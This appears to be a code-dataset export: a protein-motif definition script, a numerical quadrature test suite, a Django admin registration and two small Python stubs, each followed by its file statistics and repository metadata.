  src_atom = ' O ',
  trg_index = 'n')
bond9.add_target_atom(
  atomname = ' H ',
  anyseqdist = True)

bond10 = residue8.add_bond(
  required = True,
  src_atom = ' H ',
  trg_index = 'n')
bond10.add_target_atom(
  atomname = ' O ',
  anyseqdist = True)

residue9 = antiparallel_beta_wcw.add_residue(
  sequence_move = 1,
  end_of_motif = False,
  index = 'n')
bond11 = residue9.add_bond(
  required = True,
  src_atom = ' O ',
  trg_index = 'k')
bond11.add_target_atom(
  atomname = ' H ',
  anyseqdist = True)

bond12 = residue9.add_bond(
  required = True,
  src_atom = ' H ',
  trg_index = 'k')
bond12.add_target_atom(
  atomname = ' O ',
  anyseqdist = True)

residue10 = antiparallel_beta_wcw.add_residue(
  sequence_move = 1,
  end_of_motif = False,
  index = 'o')

# Final residue p closes the motif; its bonds to i are re-asserted here.
residue11 = antiparallel_beta_wcw.add_residue(
  end_of_motif = True,
  index = 'p')
bond13 = residue11.add_bond(
  required = True,
  src_atom = ' O ',
  trg_index = 'i')
bond13.add_target_atom(
  atomname = ' H ',
  anyseqdist = True)

bond14 = residue11.add_bond(
  required = True,
  src_atom = ' H ',
  trg_index = 'i')
bond14.add_target_atom(
  atomname = ' O ',
  anyseqdist = True)

#-------------------------------------------------------------------------------

#Antiparallel beta wide
#Original by Christopher Williams, converted to new format by Danny Oh
#Two strands:
# e (f) g* (h)* i* (j) k
# t (s) r* (q)* p* (o) n

# Second motif: same construction pattern, but note the residueN/bondN names
# are deliberately reused from the first motif above — order matters.
antiparallel_beta_cwc = cablam_fingerprints.motif(
  motif_name = "antiparallel_beta_cwc",
  residue_names = {"q":"antiparallel_beta_wide", "h":"antiparallel_beta_wide"})

residue1 = antiparallel_beta_cwc.add_residue(
  bond_move = 'p',
  end_of_motif = False,
  index = 'i')
bond1 = residue1.add_bond(
  required = True,
  src_atom = ' O ',
  trg_index = 'p')
bond1.add_target_atom(
  atomname = ' H ',
  anyseqdist = True)

bond2 = residue1.add_bond(
  required = True,
  src_atom = ' H ',
  trg_index = 'p')
bond2.add_target_atom(
  atomname = ' O ',
  anyseqdist = True)

residue2 = antiparallel_beta_cwc.add_residue(
  sequence_move = 1,
  end_of_motif = False,
  index = 'p')
bond3 = residue2.add_bond(
  required = True,
  src_atom = ' O ',
  trg_index = 'i')
bond3.add_target_atom(
  atomname = ' H ',
  anyseqdist = True)

bond4 = residue2.add_bond(
  required = True,
  src_atom = ' H ',
  trg_index = 'i')
bond4.add_target_atom(
  atomname = ' O ',
  anyseqdist = True)

residue3 = antiparallel_beta_cwc.add_residue(
  sequence_move = 1,
  end_of_motif = False,
  index = 'q')

# Residue r: unlike the wcw motif above, the H->O bond is listed first here.
residue4 = antiparallel_beta_cwc.add_residue(
  bond_move = 'g',
  end_of_motif = False,
  index = 'r')
bond5 = residue4.add_bond(
  required = True,
  src_atom = ' H ',
  trg_index = 'g')
bond5.add_target_atom(
  atomname = ' O ',
  anyseqdist = True)

bond6 = residue4.add_bond(
  required = True,
  src_atom = ' O ',
  trg_index = 'g')
bond6.add_target_atom(
  atomname = ' H ',
  anyseqdist = True)

residue5 = antiparallel_beta_cwc.add_residue(
  sequence_move = 1,
  end_of_motif = False,
  index = 'g')
bond7 = residue5.add_bond(
  required = True,
  src_atom = ' O ',
  trg_index = 'r')
bond7.add_target_atom(
  atomname = ' H ',
  anyseqdist = True)

bond8 = residue5.add_bond(
  required = True,
  src_atom = ' H ',
  trg_index = 'r')
bond8.add_target_atom(
  atomname = ' O ',
  anyseqdist = True)

residue6 = antiparallel_beta_cwc.add_residue(
  sequence_move = 1,
  end_of_motif = False,
  index = 'h')

residue7 = antiparallel_beta_cwc.add_residue(
  sequence_move = 2,
  end_of_motif = False,
  index = 'i')
bond9 = residue7.add_bond(
  required = True,
  src_atom = ' O ',
  trg_index = 'p')
bond9.add_target_atom(
  atomname = ' H ',
  anyseqdist = True)

bond10 = residue7.add_bond(
  required = True,
  src_atom = ' H ',
  trg_index = 'p')
bond10.add_target_atom(
  atomname = ' O ',
  anyseqdist = True)

# Residues k and n: only a single required bond in each direction here
# (H->O from k to n, O->H from n to k), not the full reciprocal pair.
residue8 = antiparallel_beta_cwc.add_residue(
  bond_move = 'n',
  end_of_motif = False,
  index = 'k')
bond11 = residue8.add_bond(
  required = True,
  src_atom = ' H ',
  trg_index = 'n')
bond11.add_target_atom(
  atomname = ' O ',
  anyseqdist = True)

residue9 = antiparallel_beta_cwc.add_residue(
  sequence_move = 6,
  end_of_motif = False,
  index = 'n')
bond12 = residue9.add_bond(
  required = True,
  src_atom = ' O ',
  trg_index = 'k')
bond12.add_target_atom(
  atomname = ' H ',
  anyseqdist = True)

# Residues t and e: single bonds tying the strand ends together.
residue10 = antiparallel_beta_cwc.add_residue(
  bond_move = 'e',
  end_of_motif = False,
  index = 't')
bond13 = residue10.add_bond(
  required = True,
  src_atom = ' H ',
  trg_index = 'e')
bond13.add_target_atom(
  atomname = ' O ',
  anyseqdist = True)

residue11 = antiparallel_beta_cwc.add_residue(
  sequence_move = 2,
  end_of_motif = False,
  index = 'e')
bond14 = residue11.add_bond(
  required = True,
  src_atom = ' O ',
  trg_index = 't')
bond14.add_target_atom(
  atomname = ' H ',
  anyseqdist = True)

residue12 = antiparallel_beta_cwc.add_residue(
  end_of_motif = True,
  index = 'g')

# Script entry point: serialize both finished motifs to pickle files.
if __name__ == "__main__":
  cablam_fingerprints.make_pickle(antiparallel_beta_wcw)
  cablam_fingerprints.make_pickle(antiparallel_beta_cwc)
22.633136
81
0.665621
1,028
7,650
4.641051
0.092412
0.117376
0.088032
0.111507
0.920352
0.89017
0.866904
0.739258
0.687277
0.641794
0
0.024478
0.198954
7,650
337
82
22.700297
0.75408
0.047974
0
0.83165
0
0
0.058581
0.018152
0
0
0
0
0
1
0
false
0
0.006734
0
0.006734
0.020202
0
0
0
null
0
0
0
1
1
1
1
0
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
89fd5e7b827cbc8dfc54685256725b13d85146c3
22,334
py
Python
src/quadrature_test.py
rvanvenetie/stbem
6f79ed172fa085226a825a61927084c556743103
[ "MIT" ]
null
null
null
src/quadrature_test.py
rvanvenetie/stbem
6f79ed172fa085226a825a61927084c556743103
[ "MIT" ]
null
null
null
src/quadrature_test.py
rvanvenetie/stbem
6f79ed172fa085226a825a61927084c556743103
[ "MIT" ]
null
null
null
import itertools import numpy as np import quadpy from pytest import approx from scipy.special import exp1, expi from .parametrization import UnitSquare, circle from .quadrature import (DuffyScheme2D, DuffySchemeIdentical3D, DuffySchemeTouch3D, ProductScheme2D, ProductScheme3D, QuadpyScheme2D, gauss_quadrature_scheme, gauss_sqrtinv_quadrature_scheme, gauss_x_quadrature_scheme, log_log_quadrature_scheme, log_quadrature_scheme, sqrt_quadrature_scheme) from .quadrature_rules import (LOG_LOG_QUAD_RULES, LOG_QUAD_RULES, SQRT_QUAD_RULES) def test_quadrature(): for N_poly in [1, 3, 5, 7, 9, 11]: scheme = gauss_quadrature_scheme(N_poly) # Check that it integrates polynomials exactly. for k in range(N_poly + 1): f = lambda x: x**k assert scheme.integrate(f, 0, 1) == approx(1. / (1 + k)) assert scheme.integrate(f, 1, 5) == approx( (5**(k + 1) - 1.) / (1. + k)) def test_log_quadrature(): for N_poly, N_poly_log in LOG_QUAD_RULES: print(N_poly, N_poly_log) scheme = log_quadrature_scheme(N_poly, N_poly_log) # First, check that it integrates polynomials exactly. for k in range(N_poly + 1): print(k) f = lambda x: x**k assert scheme.integrate(f, 0, 1) == approx(1. / (1 + k)) assert scheme.integrate(f, 1, 5) == approx( (5**(k + 1) - 1.) / (1. + k)) # Secondly, check that it integrates log polynomial exactly. for k in range(N_poly_log + 1): f = lambda x: x**k * np.log(x) assert scheme.integrate(f, 0, 1) == approx(-1. / (1 + k)**2) #assert scheme.integrate(f, 0, 3) == approx( # (3**(1 + k) * (-1 + np.log(3) + k * np.log(3))) / (1 + k)**2) def test_log_log_quadrature(): for N_poly, N_poly_log in LOG_LOG_QUAD_RULES: print(N_poly, N_poly_log) scheme = log_log_quadrature_scheme(N_poly, N_poly_log) # First, check that it integrates polynomials exactly. for k in range(N_poly + 1): print(k) f = lambda x: x**k assert scheme.integrate(f, 0, 1) == approx(1. / (1 + k)) assert scheme.integrate(f, 1, 5) == approx( (5**(k + 1) - 1.) / (1. 
+ k)) # Secondly, check that it integrates log(x) x^k exactly. for k in range(N_poly_log + 1): f = lambda x: x**k * np.log(x) assert scheme.integrate(f, 0, 1) == approx(-1. / (1 + k)**2) #assert scheme.integrate(f, 0, 3) == approx( # (3**(1 + k) * (-1 + np.log(3) + k * np.log(3))) / (1 + k)**2) # Secondly, check that it integrates log(1-x) x^k exactly. vals = [ -1, -(3 / 4), -(11 / 18), -(25 / 48), -(137 / 300), -(49 / 120), -(363 / 980), -(761 / 2240), -(7129 / 22680), -(7381 / 25200), -(83711 / 304920) ] for k in range(N_poly_log + 1): f = lambda x: x**k * np.log(1 - x) assert scheme.integrate(f, 0, 1) == approx(vals[k]) #assert scheme.integrate(f, 0, 3) == approx( # (3**(1 + k) * (-1 + np.log(3) + k * np.log(3))) / (1 + k)**2) def test_sqrt_quadrature(): for N_poly, N_poly_sqrt in SQRT_QUAD_RULES: scheme = sqrt_quadrature_scheme(N_poly, N_poly_sqrt) # First, check that it integrates polynomials exactly. for k in range(N_poly + 1): f = lambda x: x**k assert scheme.integrate(f, 0, 1) == approx(1. / (1 + k)) assert scheme.integrate(f, 1, 5) == approx( (5**(k + 1) - 1.) / (1. + k)) # Secondly, check that it integrates log polynomial exactly. for k in range(N_poly_sqrt + 1): print(N_poly, N_poly_sqrt) f = lambda x: x**k * np.sqrt(x) assert scheme.integrate(f, 0, 1) == approx(2 / (2 * k + 3)) assert scheme.integrate(f, 0, 5) == approx( (2 * 5**(3 / 2 + k)) / (3 + 2 * k)) def test_gauss_sqrtinv_quadrature(): for N_poly in range(1, 21, 2): scheme = gauss_sqrtinv_quadrature_scheme(N_poly) # Check that it integrates weighted polynomials exactly. for k in range(N_poly + 1): f = lambda x: x**k assert scheme.integrate(f, 0, 1) == approx(2 / (1 + 2 * k)) assert scheme.integrate(f, 0, 5) == approx( (2 * 5**(1 + k)) / (1 + 2 * k)) def test_gauss_x_quadrature(): for N_poly in range(1, 21, 2): scheme = gauss_x_quadrature_scheme(N_poly) # Check that it integrates weighted polynomials exactly. 
for k in range(N_poly + 1): f = lambda x: x**k assert scheme.integrate(f, 0, 1) == approx(1 / (2 + k)) assert scheme.integrate(f, 0, 5) == approx(5**(1 + k) / (2 + k)) def test_product_quadrature(): for N_poly_x, N_poly_y in itertools.product([1, 3, 5, 7, 9, 11], [1, 3, 5, 7, 9, 11]): scheme_x = gauss_quadrature_scheme(N_poly_x) scheme_y = gauss_quadrature_scheme(N_poly_y) scheme = ProductScheme2D(scheme_x, scheme_y) for i in range(N_poly_x + 1): for j in range(N_poly_y + 1): f = lambda x: x[0]**i * x[1]**j assert scheme.integrate(f, 0, 1, 0, 1) == approx(1. / (1 + i + j + i * j)) assert scheme.integrate(f, 2, 5, 3, 10) == approx( ((2**(1 + i) - 5**(1 + i)) * (3**(1 + j) - 10**(1 + j))) / ((1 + j) * (1 + i))) def test_quadpy_schemes(): for poly in range(11): quad_scheme = quadpy.c2.get_good_scheme(poly) scheme = QuadpyScheme2D(quad_scheme) for i in range(poly + 1): for j in range(poly + 1): if i + j >= poly: continue f = lambda x: x[0]**i * x[1]**j assert scheme.integrate(f, 0, 1, 0, 1) == approx(1. 
/ (1 + i + j + i * j)) assert scheme.integrate(f, 2, 5, 3, 10) == approx( ((2**(1 + i) - 5**(1 + i)) * (3**(1 + j) - 10**(1 + j))) / ((1 + j) * (1 + i))) def test_product_log_quadrature(): for N_log_poly_x, N_poly_y in itertools.product([1, 3, 5, 7, 9], [1, 3, 5, 7, 9, 11]): scheme_x = log_quadrature_scheme(N_log_poly_x, N_log_poly_x) scheme_y = gauss_quadrature_scheme(N_poly_y) scheme = ProductScheme2D(scheme_x, scheme_y) for i in range(N_log_poly_x + 1): for j in range(N_poly_y + 1): f = lambda x: x[0]**i * (1 + np.log(x[0])) * x[1]**j assert scheme.integrate(f, 0, 1, 0, 1) == approx( i / ((1 + i)**2 * (1 + j))) def test_duffy_quadrature(): for symmetric in [True, False]: f = lambda x: (x[0] - x[1])**2 * np.log((x[0] - x[1])**2) scheme_x = log_quadrature_scheme(3, 3) scheme_y = log_quadrature_scheme(2, 2) scheme = ProductScheme2D(scheme_x, scheme_y) duff_scheme = DuffyScheme2D(scheme, symmetric=symmetric) assert duff_scheme.integrate(f, 0, 1, 0, 1) == approx(-0.19444444444444444444, rel=1e-15, abs=0) def test_singular_quadrature(): def f(x): diff = (x[0] - x[1])**2 return np.exp(-diff) + (1 + diff) * expi(-diff) # Integrate over [0,1] x [0, 1]. 
val_exact = -1.87010542468505982755377882 rel_error = 1 for n in range(2, 13): scheme = log_quadrature_scheme(n, n) duff_scheme = DuffyScheme2D(ProductScheme2D(scheme, scheme), symmetric=True) q_f = duff_scheme.integrate(f, 0, 1, 0, 1) q_f_23 = duff_scheme.integrate(f, 2, 3, 2, 3) assert q_f == approx(q_f_23) new_rel_error = abs((q_f - val_exact) / val_exact) print(n, new_rel_error) assert new_rel_error < rel_error or new_rel_error < 1e-15 rel_error = new_rel_error assert rel_error < 1e-15 # Integrate over [0,1] x [1,2] val_exact = -0.24318315547349982560 rel_error = 1 for n in range(2, 13): scheme = log_quadrature_scheme(n, n) duff_scheme = DuffyScheme2D(ProductScheme2D(scheme, scheme), symmetric=True).mirror_x() q_f = duff_scheme.integrate(f, 0, 1, 1, 2) q_f_23 = duff_scheme.integrate(f, 1, 2, 2, 3) assert q_f == approx(q_f_23) new_rel_error = abs((q_f - val_exact) / val_exact) print(n, new_rel_error) assert new_rel_error < rel_error or new_rel_error < 1e-15 rel_error = new_rel_error assert rel_error < 1e-14 # Integrate over [0,2] x [2,3] val_exact = -0.24656642836945459944 rel_error = 1 for n in range(0, 13, 2): scheme = log_quadrature_scheme(n, n) duff_scheme = DuffyScheme2D(ProductScheme2D(scheme, scheme), symmetric=False).mirror_x() q_f = duff_scheme.integrate(f, 0, 2, 2, 3) q_f_24 = duff_scheme.integrate(f, 1, 3, 3, 4) assert q_f == approx(q_f_24) new_rel_error = abs((q_f - val_exact) / val_exact) print(n, new_rel_error) assert new_rel_error < rel_error or new_rel_error < 1e-15 rel_error = new_rel_error assert rel_error < 1e-9 # Integrate over [0,1] x [1,3] rel_error = 1 for n in range(0, 13, 2): scheme = log_quadrature_scheme(n, n) duff_scheme = DuffyScheme2D(ProductScheme2D(scheme, scheme), symmetric=False).mirror_x() q_f = duff_scheme.integrate(f, 0, 1, 1, 3) q_f_24 = duff_scheme.integrate(f, 1, 2, 2, 4) assert q_f == approx(q_f_24) new_rel_error = abs((q_f - val_exact) / val_exact) print(n, new_rel_error) assert new_rel_error < rel_error or new_rel_error 
< 1e-15 rel_error = new_rel_error assert rel_error < 1e-9 # Integrate over [0,1] x [2,3] val_exact = -0.0033832728959547738380 rel_error = 1 for n in range(1, 13): log_scheme = log_quadrature_scheme(n, n) prod_scheme = ProductScheme2D(log_scheme.mirror(), log_scheme) q_f = prod_scheme.integrate(f, 0, 1, 2, 3) q_f_24 = prod_scheme.integrate(f, 1, 2, 3, 4) assert q_f == approx(q_f_24) new_rel_error = abs((q_f - val_exact) / val_exact) print(n, new_rel_error) assert new_rel_error < rel_error or new_rel_error < 1e-15 rel_error = new_rel_error # Assert that some quadrature schemes work better than others. prod_mirror_scheme = ProductScheme2D(log_scheme, log_scheme) assert abs(prod_mirror_scheme.integrate(f, 0, 1, 2, 3) - val_exact) > abs(q_f - val_exact) assert rel_error < 1e-15 def test_singular_quadrature_circle(): def f(x): #return np.log(x[0] + 4 * x[1]) diff = circle(x[0]) - circle(x[1]) normsqr = np.sum(diff**2, axis=0) return np.exp(-normsqr) + (1 + normsqr) * expi(-normsqr) # Integrate over [0,1] x [0,1] val_exact = -1.87629901756723965199622242456 rel_error = 1 for n in range(2, 13): scheme = log_quadrature_scheme(n, n) duff_scheme = DuffyScheme2D(ProductScheme2D(scheme, scheme), symmetric=True) q_f = duff_scheme.integrate(f, 0, 1, 0, 1) q_f_23 = duff_scheme.integrate(f, 1, 2, 1, 2) assert q_f == approx(q_f_23) new_rel_error = abs((q_f - val_exact) / val_exact) print(n, new_rel_error) assert new_rel_error < rel_error or new_rel_error < 1e-15 rel_error = new_rel_error assert rel_error < 1e-12 # Integrate over [0,1] x [2pi - 1, 2pi] val_exact = -0.253663490380649986736253376122 rel_error = 1 for n in range(2, 13): scheme = log_quadrature_scheme(n, n) duff_scheme = DuffyScheme2D(ProductScheme2D(scheme, scheme), symmetric=False).mirror_y() q_f = duff_scheme.integrate(f, 0, 1, 2 * np.pi - 1, 2 * np.pi) q_f_23 = duff_scheme.integrate(f, 1, 2, 2 * np.pi, 2 * np.pi + 1) assert q_f == approx(q_f_23) new_rel_error = abs((q_f - val_exact) / val_exact) print(n, 
new_rel_error) assert new_rel_error < rel_error or new_rel_error < 1e-15 rel_error = new_rel_error assert rel_error < 1e-12 # Integrate over [0,1] x [1, 2] rel_error = 1 for n in range(2, 13): scheme = log_quadrature_scheme(n, n) duff_scheme = DuffyScheme2D(ProductScheme2D(scheme, scheme), symmetric=False).mirror_x() q_f = duff_scheme.integrate(f, 0, 1, 1, 2) q_f_23 = duff_scheme.integrate(f, 1, 2, 2, 3) assert q_f == approx(q_f_23) new_rel_error = abs((q_f - val_exact) / val_exact) print(n, new_rel_error) assert new_rel_error < rel_error or new_rel_error < 1e-15 rel_error = new_rel_error assert rel_error < 1e-12 def test_singular_quadrature_corner(): gamma = UnitSquare() def f(x): diff = gamma.eval(x[0]) - gamma.eval(x[1]) normsqr = np.sum(diff**2, axis=0) return np.exp(-normsqr) + (1 + normsqr) * expi(-normsqr) # Integrate over [0,1] x [0,1] val_exact = -1.87010542468505982755377882 rel_error = 1 for n in range(2, 13): scheme = log_quadrature_scheme(n, n) duff_scheme = DuffyScheme2D(ProductScheme2D(scheme, scheme), symmetric=True) q_f = duff_scheme.integrate(f, 0, 1, 0, 1) q_f_34 = duff_scheme.integrate(f, 3, 4, 3, 4) assert q_f == approx(q_f_34) new_rel_error = abs((q_f - val_exact) / val_exact) print(n, new_rel_error) assert new_rel_error < rel_error or new_rel_error < 1e-15 rel_error = new_rel_error assert rel_error < 1e-15 # Integrate over [0,1] x [1,2] val_exact = -0.3718093426679699430449066 rel_error = 1 for n in range(2, 13): scheme = log_quadrature_scheme(n, n) duff_scheme = DuffyScheme2D(ProductScheme2D(scheme, scheme), symmetric=False).mirror_x() q_f = duff_scheme.integrate(f, 0, 1, 1, 2) assert q_f == approx(duff_scheme.integrate(f, 1, 2, 2, 3)) assert q_f == approx(duff_scheme.integrate(f, 2, 3, 3, 4)) assert q_f == approx(duff_scheme.integrate(f, 3, 4, 0, 1)) new_rel_error = abs((q_f - val_exact) / val_exact) print(n, new_rel_error) assert new_rel_error < rel_error or new_rel_error < 1e-15 rel_error = new_rel_error assert rel_error < 1e-12 # 
Integrate over [1,2] x [0,1] rel_error = 1 for n in range(2, 13): scheme = log_quadrature_scheme(n, n) duff_scheme = DuffyScheme2D(ProductScheme2D(scheme, scheme), symmetric=False).mirror_y() q_f = duff_scheme.integrate(f, 1, 2, 0, 1) assert q_f == approx(duff_scheme.integrate(f, 2, 3, 1, 2)) assert q_f == approx(duff_scheme.integrate(f, 3, 4, 2, 3)) assert q_f == approx(duff_scheme.integrate(f, 0, 1, 3, 4)) new_rel_error = abs((q_f - val_exact) / val_exact) print(n, new_rel_error) assert new_rel_error < rel_error or new_rel_error < 1e-15 rel_error = new_rel_error assert rel_error < 1e-12 def test_singular_duffy_3d_id(): b = 0.25 G_time = lambda xy: 1. / (4 * np.pi) * exp1(xy / (4 * b)) # Test with u0 = 1. u0 = lambda y: np.ones(y.shape[1]) h = 1 f = lambda xyz: u0(xyz) * G_time(h**2 * ((xyz[0] - xyz[1])**2 + xyz[2]**2)) val_exact = 0.075961144077555044645 rel_error = 1 for n in range(2, 13): scheme = log_quadrature_scheme(n, n) duff_scheme = DuffySchemeIdentical3D(ProductScheme3D(scheme), symmetric_xy=False) q_f = duff_scheme.integrate(f, 0, 1, 0, 1, 0, 1) new_rel_error = abs((q_f - val_exact) / val_exact) print(n, new_rel_error) assert new_rel_error < rel_error or new_rel_error < 1e-12 rel_error = new_rel_error assert rel_error < 1e-12 h = 0.25 f = lambda xyz: u0(xyz) * G_time(h**2 * ((xyz[0] - xyz[1])**2 + xyz[2]**2)) val_exact = 0.0041485131062119699490 rel_error = 1 for n in range(2, 13): scheme = log_quadrature_scheme(n, n) duff_scheme = DuffySchemeIdentical3D(ProductScheme3D(scheme), symmetric_xy=True) q_f = h**3 * duff_scheme.integrate(f, 0, 1, 0, 1, 0, 1) new_rel_error = abs((q_f - val_exact) / val_exact) print(n, new_rel_error) assert new_rel_error < rel_error or new_rel_error < 1e-12 rel_error = new_rel_error assert rel_error < 1e-12 # Test with u0 = sin(x) * y u0 = lambda xy: np.sin(xy[0]) * xy[1] h = 0.25 vertices = [(1, 1), (1 - h, 1), (1, 1 - h), (1 - h, 1 - h)] v0, v1, v2 = [np.array(vtx).reshape(-1, 1) for vtx in vertices][0:3] # Make 
parametrization of the element Q. gamma_Q = lambda x, z: v0 + (v1 - v0) * x + (v2 - v0) * z gamma_K = lambda y: v0 + (v1 - v0) * y assert np.all(gamma_K(0) == v0) assert np.all(gamma_K(1) == v1) assert np.all(gamma_Q(0.5, 0) == gamma_K(0.5)) assert not np.all(gamma_Q(0.5, 1) == gamma_K(0.5)) #def f(xyz): # x, y, z = xyz # return u0(gamma_Q(x, z)) * G_time( # np.sum((gamma_Q(x, z) - gamma_Q(y, 0))**2, axis=0)) f = lambda xyz: u0(gamma_Q(xyz[0], xyz[2])) * G_time(h**2 * ( (xyz[0] - xyz[1])**2 + xyz[2]**2)) val_exact = 0.0028374980621858479108 rel_error = 1 for n in range(4, 12): scheme = log_quadrature_scheme(n, n) duff_scheme = DuffySchemeIdentical3D(ProductScheme3D(scheme), symmetric_xy=False) fx = f(duff_scheme.points) q_f = h**3 * np.dot(fx, duff_scheme.weights) new_rel_error = abs((q_f - val_exact) / val_exact) print(n, new_rel_error) assert new_rel_error < rel_error or new_rel_error < 1e-12 rel_error = new_rel_error assert rel_error < 1e-12 def test_singular_duffy_3d_touch(): # Test the touch quadrature rule. f = lambda xyz: np.log((xyz[0] + xyz[1])**2 + xyz[2]**2) val_exact = 0.1781673429530223041202893120098701898314 rel_error = 1 for n in range(2, 13): scheme = log_quadrature_scheme(n, n) duff_scheme = DuffySchemeTouch3D(ProductScheme3D(scheme)) q_f = duff_scheme.integrate(f, 0, 1, 0, 1, 0, 1) new_rel_error = abs((q_f - val_exact) / val_exact) print(n, new_rel_error) assert new_rel_error < rel_error or new_rel_error < 1e-12 rel_error = new_rel_error assert rel_error < 1e-12 # Test the touch quadrature rule. 
f = lambda xyz: np.log(xyz[0]**2 + (xyz[1] + xyz[2])**2) val_exact = 0.1781673429530223041202893120098701898314 rel_error = 1 for n in range(2, 13): scheme = log_quadrature_scheme(n, n) duff_scheme = DuffySchemeTouch3D(ProductScheme3D(scheme)) q_f = duff_scheme.integrate(f, 0, 1, 0, 1, 0, 1) new_rel_error = abs((q_f - val_exact) / val_exact) print(n, new_rel_error) assert new_rel_error < rel_error or new_rel_error < 1e-12 rel_error = new_rel_error assert rel_error < 1e-12 f = lambda xyz: np.log((xyz[0] + 2 * xyz[1])**2 + xyz[2]**2) val_exact = 0.80392693298465673176 rel_error = 1 for n in range(2, 13): scheme = log_quadrature_scheme(n, n) duff_scheme = DuffySchemeTouch3D(ProductScheme3D(scheme)) q_f = duff_scheme.integrate(f, 0, 1, 0, 1, 0, 1) new_rel_error = abs((q_f - val_exact) / val_exact) print(n, new_rel_error) assert new_rel_error < rel_error or new_rel_error < 1e-12 rel_error = new_rel_error assert rel_error < 1e-12 f = lambda xyz: np.log((xyz[0] + 0.5 * xyz[1])**2 + xyz[2]**2) val_exact = -0.22999882492711279068 rel_error = 1 for n in range(2, 13): scheme = log_quadrature_scheme(n, n) duff_scheme = DuffySchemeTouch3D(ProductScheme3D(scheme)) q_f = duff_scheme.integrate(f, 0, 1, 0, 1, 0, 1) new_rel_error = abs((q_f - val_exact) / val_exact) print(n, new_rel_error) assert new_rel_error < rel_error or new_rel_error < 1e-11 rel_error = new_rel_error assert rel_error < 1e-11 v0 = np.array([1., 1.]).reshape(-1, 1) v1 = np.array([2, 1.]).reshape(-1, 1) v2 = np.array([0, 1]).reshape(-1, 1) v3 = np.array([1, 0]).reshape(-1, 1) h_elem = 1 h = 1 # Create parametrizations of Q and K. 
gamma_K = lambda y: v0 + (v1 - v0) * y gamma_Q = lambda x, z: v0 + (v2 - v0) * x + (v3 - v0) * z assert np.all(gamma_Q(0, 0) == gamma_K(0)) #u0 = lambda xy: np.ones(xy.shape[1]) #f = lambda xyz: u0(gamma_Q(xyz[0], xyz[2])) * G_time( # np.sum((gamma_Q(xyz[0], xyz[2]) - gamma_K(xyz[1]))**2, axis=0)) f = lambda xyz: 1 / (4 * np.pi) * exp1((xyz[0] + xyz[1])**2 + xyz[2]**2) #val_exact = 0.0201681640240317535810058111329 #val_exact = 0.02016816651934319 #val_exact = 0.020168166580447650 val_exact = 0.020168166583416268 rel_error = 1 for n in range(2, 13): scheme = log_quadrature_scheme(n, n) duff_scheme = DuffySchemeTouch3D(ProductScheme3D(scheme)) fx = f(duff_scheme.points) q_f = h_elem**2 * h * np.dot(fx, duff_scheme.weights) new_rel_error = abs((q_f - val_exact) / val_exact) print(n, new_rel_error) assert new_rel_error < rel_error or new_rel_error < 1e-11 rel_error = new_rel_error assert rel_error < 1e-11
39.953488
79
0.565998
3,395
22,334
3.503976
0.055965
0.114997
0.087845
0.054304
0.819183
0.785642
0.754455
0.746049
0.725286
0.71503
0
0.095115
0.307065
22,334
558
80
40.02509
0.673559
0.083371
0
0.645833
0
0
0
0
0
0
0
0
0.189815
1
0.041667
false
0
0.018519
0
0.06713
0.055556
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
c387f0b6ac0dc40d425f0904a905daf5ed3098d0
180
py
Python
squasha/server_side/user_profile/admin.py
ameerry1998/Squasha_trello_clone
74beacfd3a05c61121cd9acb1682ad11aff42fc8
[ "MIT" ]
null
null
null
squasha/server_side/user_profile/admin.py
ameerry1998/Squasha_trello_clone
74beacfd3a05c61121cd9acb1682ad11aff42fc8
[ "MIT" ]
null
null
null
squasha/server_side/user_profile/admin.py
ameerry1998/Squasha_trello_clone
74beacfd3a05c61121cd9acb1682ad11aff42fc8
[ "MIT" ]
null
null
null
from django.contrib import admin from django.contrib.auth.admin import UserAdmin from .models import User_Profile # Register your models here. admin.site.register(User_Profile)
20
47
0.822222
26
180
5.615385
0.538462
0.136986
0.232877
0
0
0
0
0
0
0
0
0
0.116667
180
8
48
22.5
0.918239
0.144444
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
0.75
0
0.75
0
1
0
0
null
0
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
c3f5c591f6447f2b1a2f939399e267d3ff3263c5
88
py
Python
src/v8unpack/MetaDataObject/CommonModules.py
fishca/v8unpack-1
51e1bb6b57be170f0c19be20649e18abdda04668
[ "MIT" ]
null
null
null
src/v8unpack/MetaDataObject/CommonModules.py
fishca/v8unpack-1
51e1bb6b57be170f0c19be20649e18abdda04668
[ "MIT" ]
null
null
null
src/v8unpack/MetaDataObject/CommonModules.py
fishca/v8unpack-1
51e1bb6b57be170f0c19be20649e18abdda04668
[ "MIT" ]
null
null
null
from ..MetaDataObject.core.Simple import Simple class CommonModules(Simple): pass
14.666667
47
0.772727
10
88
6.8
0.8
0
0
0
0
0
0
0
0
0
0
0
0.147727
88
5
48
17.6
0.906667
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0.333333
0.333333
0
0.666667
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
1
1
0
1
0
0
6
7f03b7768499d78a702724ddeabe81fc74c838d4
135
py
Python
rpython/jit/backend/zarch/test/test_ztranslation_basic.py
nanjekyejoannah/pypy
e80079fe13c29eda7b2a6b4cd4557051f975a2d9
[ "Apache-2.0", "OpenSSL" ]
381
2018-08-18T03:37:22.000Z
2022-02-06T23:57:36.000Z
rpython/jit/backend/zarch/test/test_ztranslation_basic.py
nanjekyejoannah/pypy
e80079fe13c29eda7b2a6b4cd4557051f975a2d9
[ "Apache-2.0", "OpenSSL" ]
16
2018-09-22T18:12:47.000Z
2022-02-22T20:03:59.000Z
rpython/jit/backend/zarch/test/test_ztranslation_basic.py
nanjekyejoannah/pypy
e80079fe13c29eda7b2a6b4cd4557051f975a2d9
[ "Apache-2.0", "OpenSSL" ]
55
2015-08-16T02:41:30.000Z
2022-03-20T20:33:35.000Z
from rpython.jit.backend.llsupport.test.ztranslation_test import TranslationTest class TestTranslationZARCH(TranslationTest): pass
33.75
80
0.859259
14
135
8.214286
0.857143
0
0
0
0
0
0
0
0
0
0
0
0.081481
135
3
81
45
0.927419
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0.333333
0.333333
0
0.666667
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
